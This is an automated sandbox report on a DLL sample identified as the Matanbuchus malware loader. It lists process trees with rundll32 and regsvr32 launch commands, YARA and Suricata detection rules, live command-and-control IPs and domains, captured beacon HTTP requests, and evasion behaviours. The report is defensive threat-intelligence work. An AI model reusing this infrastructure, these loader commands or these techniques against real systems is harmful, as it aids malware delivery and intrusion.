Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.dll

Overview

General Information

Sample name:file.dll
Analysis ID:1526602
MD5:0fcf31b2d27079babd1fa08ff5e302ae
SHA1:f896d351d98b7605280b3e5eb923254b73b0c6ad
SHA256:673a791fe9d1be41e6ef53b640f22b6be06263cf4176874223178e24090b76e7
Tags:dllinit-moduleMatanbuchususer-Bitsight
Infos:

Detection

Matanbuchus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2876 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6932 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 4040 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • MpCmdRun.exe (PID: 5996 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
          • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6936 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7328 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,DllInit MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7404 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7504 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7512 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7520 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7536 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7552 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7568 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7588 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7600 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7620 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7732 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7752 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 7968 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 7984 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MatanbuchusAccording to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.dllJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
    file.dllWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
    • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
    • 0x32eb0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\8f08\user-PC\user-PC.ocxJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
      C:\Users\user\8f08\user-PC\user-PC.ocxWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
      • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
        0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
        • 0x1f365:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        • 0x20ba5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
        • 0x53940:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
        00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
          00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
          • 0x1f365:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
          • 0x20ba5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          34.2.regsvr32.exe.6b810000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
            34.2.regsvr32.exe.6b810000.0.unpackWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
            • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
            14.2.rundll32.exe.6d050000.1.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
              14.2.rundll32.exe.6d050000.1.unpackWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
              • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
              14.2.rundll32.exe.4910000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                Click to see the 25 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Network Connection Initiated By Regsvr32.EXE
                Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 193.109.85.31, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7984, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-06T13:25:27.299380+020020344681Malware Command and Control Activity Detected192.168.2.749763193.109.85.3154801TCP
                2024-10-06T13:27:45.270526+020020344681Malware Command and Control Activity Detected192.168.2.749994193.109.85.3154801TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for domain / URL
                Source: https://semurox.com/account.aspxVirustotal: Detection: 8%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\8f08\user-PC\user-PC.ocxVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.dllVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                Source: unknownHTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49763 -> 193.109.85.31:54801
                Source: Network trafficSuricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49994 -> 193.109.85.31:54801
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.109.85.27 443Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 193.109.85.31 54801
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49994
                Source: global trafficTCP traffic: 192.168.2.7:49763 -> 193.109.85.31:54801
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B4560 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,14_2_7F3B4560
                Source: global trafficHTTP traffic detected: GET /account.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: semurox.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: semurox.com
                Source: global trafficDNS traffic detected: DNS query: vilodeqa.com
                Source: unknownHTTP traffic detected: POST /blueoceansite/templates/docs/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: vilodeqa.comContent-Length: 581Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 73 65 6e 68 79 64 30 39 34 4e 44 52 31 4e 79 74 49 55 32 73 30 4f 58 63 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 6f 7a 59 6c 4e 32 51 33 56 4f 4d 33 46 78 55 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 56 45 51 30 39 36 4d 31 68 51 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 56 4c 32 78 30 5a 33 56 30 4b 30 70 78 64 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 5a 71 55 30 64 36 57 44 64 4d 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 49 78 52 30 68 6a 49 6c 30 73 49 6d 4e 6d 53 31 67 69 4f 69 4a 31 5a 7a 30 39 49 69 77 69 61 45 35 76 64 6b 70 74 49 6a 6f 69 65 44 49 33 52 47 31 44 52 46 67 31 5a 57 4a 6c 4e 6b 5a 45 4e 7a 46 79 5a 6a 49 35 55 32 68 44 59 33 6c 76 55 44 4a 52 61 30 77 76 5a 45 68 6f 63 48 4e 77 56 57 35 6a 51 56 70 33 4b 7a 42 47 61 31 49 30 50 53 49 73 49 6d 39 43 64 55 31 56 64 53 49 36 49 6a 5a 49 54 46 6c 72 65 6d 6c 69 4d 48 4a 35 56 69 49 73 49 6e 4e 30 64 56 6b 69 4f 69 4a 30 61 6b 64 50 65 6b 45 39 50 53 49 73 49 6e 5a 76 53 6d 4d 69 4f 69 49 72 52 79 38 35 62 6d 63 39 50 53 49 73 49 6e 64 42 59 30 67 69 4f 69 4a 35 52 32 35 61 62 6b 4e 45 54 57 31 6d 4c 31 46 74 65 45 63 31 49 69 77 69 64 31 46 6c 55 6b 67 69 4f 69 4a 31 52 46 4e 59 64 6e 6c 58 54 43 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 6f 79 56 47 46 73 51 30 6b 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 65 6c 52 79 63 6e 46 70 56 31 49 77 4e 6b 4e 4b 4d 6b 64 51 59 58 6c 31 65 6a 45 35 4d 56 70 48 57 6e 70 56 64 43 74 56 5a 46 70 77 4e 44 4e 70 64 45 74 52 55 6a 45 30 63 7a 30 69 66 51 3d 3d Data Ascii: data=eyJBbldGaCI6IjBsenhyd094NDR1NytIU2s0OXc9IiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsIkhkVlFwQSI6InozYlN2Q3VOM3FxUyIsIlFGWnlpaVVYWSI6InVEQ096M1hQIiwiUmJvdCI6IjJVL2x0Z3V0K0pxdSIsIlNiWlduWCI6InZqU0d6WDdMIiwiWWtKVyI6WyIxR0hjIl0sImNmS1giOiJ1Zz09IiwiaE5vdkptIjoieDI3RG1DRFg1ZWJlNkZENzFyZjI5U2hDY3lvUDJRa0wvZEhocHNwVW5jQVp3KzBGa1I0PSIsIm9CdU1VdSI6IjZITFlremliMHJ5ViIsInN0dVkiOiJ0akdPekE9PSIsInZvSmMiOiIrRy85bmc9PSIsIndBY0giOiJ5R25abkNETW1mL1FteEc1Iiwid1FlUkgiOiJ1RFNYdnlXTCIsInhlQ2NqUyI6InoyVGFsQ0k9IiwieWlpVVhZIjoielRycnFpV1IwNkNKMkdQYXl1ejE5MVpHWnpVdCtVZFpwNDNpdEtRUjE0cz0ifQ==
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: file.dll, type: SAMPLEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPEDMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3A9EF014_2_7F3A9EF0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AFA0014_2_7F3AFA00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3728BF14_2_7F3728BF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3B456014_2_7F3B4560
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35B5AE14_2_7F35B5AE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36DF4E14_2_7F36DF4E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3BFFE014_2_7F3BFFE0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F39AFC014_2_7F39AFC0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35ED3814_2_7F35ED38
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36ED6814_2_7F36ED68
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36CD5514_2_7F36CD55
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36CDD814_2_7F36CDD8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3DDDCB14_2_7F3DDDCB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36CC3114_2_7F36CC31
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35DC1C14_2_7F35DC1C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F39CC6014_2_7F39CC60
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F365C4E14_2_7F365C4E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F372CBF14_2_7F372CBF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F372A3F14_2_7F372A3F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F364A3B14_2_7F364A3B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36DA0314_2_7F36DA03
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35DA0214_2_7F35DA02
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3DDA6614_2_7F3DDA66
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3E1ABD14_2_7F3E1ABD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3ECAEF14_2_7F3ECAEF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F36693B14_2_7F36693B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D894014_2_7F3D8940
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D699D14_2_7F3D699D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F37399214_2_7F373992
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35A9E314_2_7F35A9E3
